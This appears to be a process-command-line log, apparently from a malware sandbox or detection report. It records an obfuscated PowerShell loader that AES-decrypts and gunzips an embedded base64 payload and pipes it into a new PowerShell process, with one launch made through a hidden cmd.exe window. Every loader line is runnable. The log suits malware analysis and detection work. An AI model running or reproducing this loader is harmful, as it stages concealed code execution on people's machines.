cmdline | powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - } |
cmdline | powershell - |
cmdline | C:\Windows\System32\cmd.exe /c powershell.exe $ITufmtMLHgVEL = 'AAAAAAAAAAAAAAAAAAAAADtnvX24mEK2hW8RbbL5X2KHm316RWatxcX3+7v4DZ/1WJXt3kVTfJMRSw/0Agv4WTgUnimICmwI1mp0XAg3wV1l/Nk/XEYdFNqy9etUj0KCfDTb9mf+9dmTWXKBqKtAB2lsN94OdJfyfwHNVl5YS8RKarUl1Fa92CUiZ50GLCwbh6h8+EZjgaGgrfnQhHaWcqL5afH+yxSykwgw3Izrd2g/ylvFlVtIKMkHCLf1+4Dcj/xQ5ogZ6x7gd8mDX36loJV53EpKf6h+YaaiNMufy/fNCnGeIREtR/cn+WGi4+4ixdaGBTiwo1Kgs7cGCgkkxZlr2cn71r0hDuQXImeUiAJmAnPDto4UJ/j+JzBmOR8MeP+aEnAxgXNZYkuwr3wjkdvGViUJBNQ5sqWDehTlvxASDUOjqVmo1Y13f5mZtAUhCbpebA95nGZbhQwnRMomhnNAMzaT11eK5942PK5bFEMQjY4VSZIAM7bocs1Ar1Jp7BkGk8KrYC5yAwWIG2DTeBIf/4HOFdNeMq7Q7cm/xdzQ2r2Ek/VpXZa0HkWNOV7zr+Gy/84f76/K8yC/ExryvPTCFuRMJOD+qeyWCTEYpsS/bLL9Ul1YIIgjoSwcjy/g0SyILOAqGlkx3/vd/Ty4K9gNxmFa+HAOS4EY2A7KRkyUxdLVqA+H0iVooSjzdnayWiArM+oMrukRZoOcwmZoHlt+4nn9HB60SXGPYMLePAwt/ZPprtnCRDidjEwkcSMxeBSWNBt8sTY/H7Jj0wM/ILKRwosFN2vrOI6SZbRjWDRbFzII3tIQ3xATLUz9u4zks9p5omogNO/y1f5BabsTnYH+m1yoX2Jber8Q64d3agsNov0p1wGN6A0FnMixd+G7JwbMZxLktrQ6PZifqI0bKrNhBnhFyUoq7wLZkD/mNidPkEJr/fsdBo2O5Eu/cOegjeWoTqwHz8pXQ/xiFcfn2t72629NwZjy5K6d8fK7zOs6w0Njj747xQp/d9HWnnpqnUOeLdXNNsEAhriP6pgziQPkG3y6SRYfa2a6RMHp7dmeEajl7H15HznbP3cTj/x9/vwQe1BnZFLgQQUGfSRhg8E1ucPuA29oU3rh5EqlfdOBFVKWWKMQCl9VEQ1pTHMXnOdrVHfY4zbj5n0c9If0mMsG2ZQfPLKYbeEjX/kyH++GJfXvjfyKJOAJqu6aNxK5XVqzgzjUCAnuZP8KdYLgsGS7TlLb+fSk/Xn/nPioV4FGgIKXJJhSNZTCVaxk9pbrF3oanii3et3L+uFov09w3An2THZTk51bsaupjHhNDnbi0YZ/uv1T2KnbRvLjUnHoaBdK7HI5NufgSm9CX0XTnifXfHdir3jNX3Pdun5yDOHm77hzqVpeOvbW3PwrB1bPSfA3R/3Xqn8TOgQonUjtmbbPnT92Lge0N7gSQM/rgWzVjZkPhLQ+3JjVLDgytJkziMMZhaCzuUg/w0He1NUVynSvkjm+6ZdvmKBZwt4zLhCAndi6OoP73GiZBq3KpUGvA7tRWDFwKGD4ljJv13CujWgL0BM5yULy6ZJ0jVuvJpALPauISoL/UCCH9BVUU1DYkCMvmwwIP278U39b41NFFpxnRyJ9ugKjsi82j7pjAT3nA9HH1diRLsmb9MzDWSMgxaKdV78OfbPMauMoA7+N2bYRd7cIvB4uFYEhldWgc1K6/aN35p8jexm6V0ju49Kjlo1Ym9jPhzgLlr8l6w1iPe7em8xpLTh1U7Wbv1Q9ayKusLDZL1OqI4YnvpHi7HXZKJytb2xPytAhixf7Hexmw6OxlPUv6a2vsi2MrRPtuWTYa7zhwahj8oK6dFToYhLSrDuPxm4Wole5Jvsd8Hvn4hUOPNLLMHb5wuVYnrZY5QEf4W73KzvQ8gl2ZS487ClvO6YOhj1b946UkRKnZGc+EyGEvJD02xtNuJBfSRtz55uBS1IniZoHHNSfRhPLDfnfnQtyFvjHYOwhQr6DT8wWGiKo02eOtRcDc6bZxY+WPhhGKvjf0km0RAM0R29ittdGYFzm24bL3wk4lK0x1RYhxLpbOrHlJlkgkzWQ3QdQ/ICxwnC8DEAv5OvUWL45UVoL92F3/X+PH/PmnAooOaltZiT97oWxsBdrvvRuusoQokRsxdGYENRgRtdMt210rIBAOXipRIxFm4yz6/1PuYG+Pyz1EHyQOB7fWuy7FG9nI432B2te02vvZ4zaMJ2pRGhXvO78aJv6wS55uib60BXrmMTS7inwUuqsv9uEM7COCed5P3ZR7FJxPG09h9EhVjzbS9fgH7Dof0OlQJ4MceKOtYvRiECtY1yUANcjb3cEeUO9bl3knilh9FDUQRwCeYL1WxoN620S7kAnOoXfx8kEeVP33XtQTt93ltkqkdnprS9Vqxf7AKjjBzZUsMrvwxWLN43/urxAY51NicDkqfOiiS5UZEksZgYkfzGePaAD3+k/FiLqoZMQTwFw+M0izxrg/nsiZbpa3i/IV6c/+NcOogB/nywwRbweIX3YEXUuHCs82tKesjo/Ot93/bGW1j7HKvyUIbOGiaCrOrB88kOJPxyoAe/u1w3Tki3SWWaJvvoAzF88w+Ybhz5prRR/BNqmFaUNEhJ3KY53Em5Uhk2dyPjCCTH1Oh3TeGg55ArY2lhgXyJNnM9PoAJhRZQ5VIsin5Ie4dXCDSG76mk0usbhheT3EV6vfxmGPEiWUzuS/xlLS87slZmjDUptCv20xfVisMQyVF7pYw/QDgUlLBdx1x1eTlSGapmqmXHaPWBOFeEjHWWv6KjE7EMfuizmJ/sxk2G1fJre1b8/ruq6jS62PR1kf50MpIMDS57WFiBpoCU9bAsjEs+S8o42Yn3FakwypIpmepYNZ8Gx9wbrtDreazE+ENDlAMIn0M1b7IUAu3ceVYF1J1kRKqsHPzuyMxkRryqzFYrJNbYrt5GQ7HBUgURx+N+9NcdaI+nYpsJRGa0RVEXBCC+GkY8l8FdeTWniE6+lae6eMGi3Nx3J8axMNWyUaOJSCQ4M7GC/kLCARNNIcgCxI1hdv+fxLPb9znvLmuUf+nTFh93BQnXAIj3/W5psGXmziMwutMKhkIHWHxFe8Wdh3o+WHnqQ2/J+MSKOrxqIrmSWcT7WR0WUgDoXse8PNAvGAcmYKNSuG9GtCmgbe/qAD9eCy0u8cn+VOYBfM3TOrpB5HHsmF+MDN3qC2FRETDgUQ+h4LQAgzA/HqF/yjd/u7NiZj9HdsOlhFxrlYCucRpsx0PAQ8E1AFPDxdLWaki8BJGLHEaCIO7Q82uthpaz73zTrbIinNzqIaVv/06tuvjf5wMT72e+ebc+Ie3LQks4EVUAqJMucMMb6wCrqf06Q5czWh8SPhK9I8BH0BeeNjH3iHr2pnFvbbk4ZgWPcAfsOFpLH792L8dwJWmbpCcMC3x/qsy/IZf3/tXVSco1fZJ0bunZV1g0jqmyolR1w+n19WET8ruQmose7Nhu9l7asYHY7i5EEOQik1D+1Zz8ayZt6M20Brr8FYQc3PEHO/WDxuduF+WsnAUUNke1c0/Sc5Z5Q0PACvwwxvA738cL3AfIDeB0+E7sOMlk8llo1Sq86TXqtjBskU2gxzvbAcoq4VLUldV1yaZ5RxE7s8PnuxlU/BrRQZjUoQXKVpVvA45zvP3U61F6S9yIxyyJ1dRgd6xA2/dS1IzNVEXN7xULbuhLDf0dsgljZFVHUEuyV73vy74nrUY/4Sqn+39WN/2mqpyTEFn/Kgcgs+JZWOQKJB/IfDOPi3C7iNfR+d4WXAgdnn55N+LoWH+tub+Ad9cHn4fqRoJ6JqFB9x74HViFsT8JDleAzd72SqqutK41lQ2Bl4i0vWwQEMGTf0/QpQHyi3Vx0lqkZ+1GRJDclaKlYkaSn6RRZJpGG3yzyBWO2T4b2Xj2gmhcyL7tlTEEBINASiXC+HwTXV8tNsTyLDXA3wsTC/feEs3C6msAsZfuPdnFT9rd8a+bMj44r0ybHsgREON/jTX8pfinacU7B6ku8gbVZEB9PwUMCqJ+iaj0ByMOlo7wlZkC9bKrlaWE2zrRwiE5zOOZnwCXHChEhwzueik13nwZlEHrwjhQQiaq36qGblU5aPgspHD0zjiaX7jcHt54iPiF2jT8D1g5WB5JQjU/9wSBrDvD4uzuEPMeQb5zDbq266ptjitL2YHDqCpdmvhaeTQZMJe2YG3/j';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - |
cmdline | "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = 